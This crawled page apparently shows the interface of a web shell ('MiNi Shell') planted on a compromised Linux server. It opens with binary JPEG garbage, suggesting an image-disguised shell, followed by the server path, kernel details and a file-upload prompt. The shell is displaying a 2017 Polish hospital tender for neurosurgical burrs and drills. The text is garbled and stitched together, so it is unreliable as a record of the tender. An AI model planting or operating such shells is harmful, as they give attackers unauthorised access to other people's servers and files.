JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170302/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20170302/35468-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.barlick.pl' target='_blank'>http://www.barlick.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 35468 - 2017
              z dnia 2017-03-02 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Łódź: Dostawa ostrzy, brzeszczotów, frez dla Neurochirurgii<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Uniwersytecki Szpital Kliniczny nr 1 im. N. Barlickiego w Łodzi, krajowy numer identyfikacyjny
              28877400000, ul.
              ul. Kopcińskiego 
              22,
              90153  
              Łódź, woj.
              łódzkie, państwo
              Polska, tel.
              42 677 68 24, 42 291 95 70, e-mail
              dzial.zamowien.publicznych@barlicki.pl, faks
              42 678 99 52.
              <br />
              Adres strony internetowej (URL): www.barlicki.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.barlicki.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.barlick.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />forma pisemna<br />
                Adres:
                <br />Sekretariat Finansowo-Techniczny SP ZOZO USK nr 1 UM w Łodzi, 90-153 Łódź, ul. Kopcinskiego 22, II piętro w budynku administracyjnym</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa ostrzy, brzeszczotów, frez dla Neurochirurgii<br /><b>Numer referencyjny: </b>8/ZP/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Pakiet 1- Ostrza , Brzeszczoty, frezy				
Lp	Nazwa 	Rozmiar	Jed. miary	Ilość w zestawie
1	Frez do kraniotomi krótki z zaczepem do do uchwytu uniwersalnego (spiralny), kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
2	Frez do kraniotomi średni z zaczepem do do uchwytu uniwersalnego (spiralny), kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	62
3	Frez do kraniotomi długi z zaczepem do do uchwytu uniwersalnego (spiralny), kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	62
4	Frez rozetkowy F 1,4 mm, z zaczepem, do kątnicy/prostnicy krótkiej z jednym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
5	Frez rozetkowy F 1,8 mm, z zaczepem, do kątnicy/prostnicy krótkiej z jednym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
6	Frez rozetkowy F 2,3 mm, z zaczepem, do kątnicy/prostnicy krótkiej z jednym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
7	Frez rozetkowy F 2,7 mm, z zaczepem, do kątnicy/prostnicy krótkiej z jednym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
8	Frez rozetkowy F 3,1 mm, z zaczepem, do kątnicy/prostnicy krótkiej z jednym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
9	Frez rozetkowy F 4,0 mm, z zaczepem, do kątnicy/prostnicy krótkiej z jednym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
10	Frez rozetkowy F 5,0 mm, z zaczepem, do kątnicy/prostnicy krótkiej z jednym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
11	Frez rozetkowy F 6,0 mm, z zaczepem, do kątnicy/prostnicy krótkiej z jednym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
12	Frez diamentowy F 1,0 mm, z zaczepem, do kątnicy/prostnicy krótkiej z jednym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
13	Frez diamentowy F 1,4 mm, z zaczepem, do kątnicy/prostnicy krótkiej z jednym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
14	Frez diamentowy F 1,8 mm, z zaczepem, do kątnicy/prostnicy krótkiej z jednym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
15	Frez diamentowy F 2,3 mm, z zaczepem, do kątnicy/prostnicy krótkiej z jednym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
16	Frez diamentowy F 2,7 mm, z zaczepem, do kątnicy/prostnicy krótkiej z jednym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
17	Frez diamentowy F 3,1 mm, z zaczepem, do kątnicy/prostnicy krótkiej z jednym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
18	Frez diamentowy F 4,0 mm, z zaczepem, do kątnicy/prostnicy krótkiej z jednym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
19	Frez diamentowy F 5,0 mm, z zaczepem, do kątnicy/prostnicy krótkiej z jednym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
20	Frez diamentowy F 6,0 mm, z zaczepem, do kątnicy/prostnicy krótkiej z jednym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
21	Frez rozetkowy F 1,0 mm, z zaczepem, do kątnicy/prostnicy średniej z dwoma pierścieniami, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
22	Frez rozetkowy F 1,4 mm, z zaczepem, do kątnicy/prostnicy średniej z dwoma pierścieniami, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
23	Frez rozetkowy F 1,8 mm, z zaczepem, do kątnicy/prostnicy średniej z dwoma pierścieniami, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
24	Frez rozetkowy F 2,3 mm, z zaczepem, do kątnicy/prostnicy średniej z dwoma pierścieniami, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
25	Frez rozetkowy F 2,7 mm, z zaczepem, do kątnicy/prostnicy średniej z dwoma pierścieniami, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
26	Frez rozetkowy F 3,1 mm, z zaczepem, do kątnicy/prostnicy średniej z dwoma pierścieniami, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
27	Frez rozetkowy F 4,0 mm, z zaczepem, do kątnicy/prostnicy średniej z dwoma pierścieniami, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
28	Frez rozetkowy F 5,0 mm, z zaczepem, do kątnicy/prostnicy średniej z dwoma pierścieniami, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	31
29	Frez rozetkowy F 6,0 mm, z zaczepem, do kątnicy/prostnicy średniej z dwoma pierścieniami, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	31
30	Frez diamentowy F 1,0 mm, z zaczepem, do kątnicy/prostnicy średniej z dwoma pierścieniami, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
31	Frez diamentowy F 1,4 mm, z zaczepem, do kątnicy/prostnicy średniej z dwoma pierścieniami, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
32	Frez diamentowy F 1,8 mm, z zaczepem, do kątnicy/prostnicy średniej z dwoma pierścieniami, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
33	Frez diamentowy F 2,3 mm, z zaczepem, do kątnicy/prostnicy średniej z dwoma pierścieniami, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
34	Frez diamentowy F 2,7 mm, z zaczepem, do kątnicy/prostnicy średniej z dwoma pierścieniami, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
35	Frez diamentowy F 3,1 mm, z zaczepem, do kątnicy/prostnicy średniej z dwoma pierścieniami, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
36	Frez diamentowy F 4,0 mm, z zaczepem, do kątnicy/prostnicy średniej z dwoma pierścieniami, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	31
37	Frez diamentowy F 5,0 mm, z zaczepem, do kątnicy/prostnicy średniej z dwoma pierścieniami, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	31
38	Frez diamentowy F 6,0 mm, z zaczepem, do kątnicy/prostnicy średniej z dwoma pierścieniami, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	31
39	Frez rozetkowy F 2,3 mm, z zaczepem, do kątnicy extra długiej z jednym grubym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
40	Frez rozetkowy F 3,1 mm, z zaczepem, do kątnicy extra długiej z jednym grubym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
41	Frez rozetkowy F 4,0 mm, z zaczepem, do kątnicy extra długiej z jednym grubym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	31
42	Frez rozetkowy F 5,0 mm, z zaczepem, do kątnicy extra długiej z jednym grubym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	31
43	Frez rozetkowy F 6,0 mm, z zaczepem, do kątnicy extra długiej z jednym grubym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	31
44	Frez diamentowy F 2,3 mm, z zaczepem, do kątnicy extra długiej z jednym grubym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
45	Frez diamentowy F 3,1 mm, z zaczepem, do kątnicy extra długiej z jednym grubym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	18
46	Frez diamentowy F 4,0 mm, z zaczepem, do kątnicy extra długiej z jednym grubym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	31
47	Frez diamentowy F 5,0 mm, z zaczepem, do kątnicy extra długiej z jednym grubym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	31
48	Frez diamentowy F 6,0 mm, z zaczepem, do kątnicy extra długiej z jednym grubym pierścieniem, kompatybilny z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczony do użytku przez producenta wiertarki	x	szt.	31
49	Wiertło spiralne  1,2 mm, z zaczepem, do uchwytu kraniotomu, kompatybilne z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczone do użytku przez producenta wiertarki	x		25
50	Wiertło spiralne  1,5 mm, z zaczepem, do uchwytu kraniotomu, kompatybilne z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczone do użytku przez producenta wiertarki	x		25
51	Wiertło spiralne  1,5 mm, z zaczepem, do kątnicy/prostnicy krótkiej z jednym pierścieniem, kompatybilne z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczone do użytku przez producenta wiertarki	x		25
52	Wiertło spiralne  2,0 mm, z zaczepem, do kątnicy/prostnicy krótkiej z jednym pierścieniem, kompatybilne z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczone do użytku przez producenta wiertarki	x		25
53	Wiertło spiralne  1,5 mm, z zaczepem, do kątnicy/prostnicy średniej z dwoma pierścieniami, kompatybilne z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczone do użytku przez producenta wiertarki	x		25
54	Wiertło spiralne  2,0 mm, z zaczepem, do kątnicy/prostnicy średniej z dwoma pierścieniami, kompatybilne z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczone do użytku przez producenta wiertarki	x		25
55	Wiertło spiralne  1,5 mm, z zaczepem, do kątnicy extra długiej z jednym grubym pierścieniem, kompatybilne z posiadaną wiertarką MS UNI - Aesculap AG i dopuszczone do użytku przez producenta wiertarki	x		25
Wartość 522418,45 PLN netto<br /><br /><b>II.5) Główny kod CPV: </b>33140000-3<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              522418.45<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 15<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1.	Odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt. 1 ustawy.
1.1	 Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej, składa dokument/dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. 
1.2	Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba,  której dokument dotyczy, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. 
1.3	 W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę, zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu.
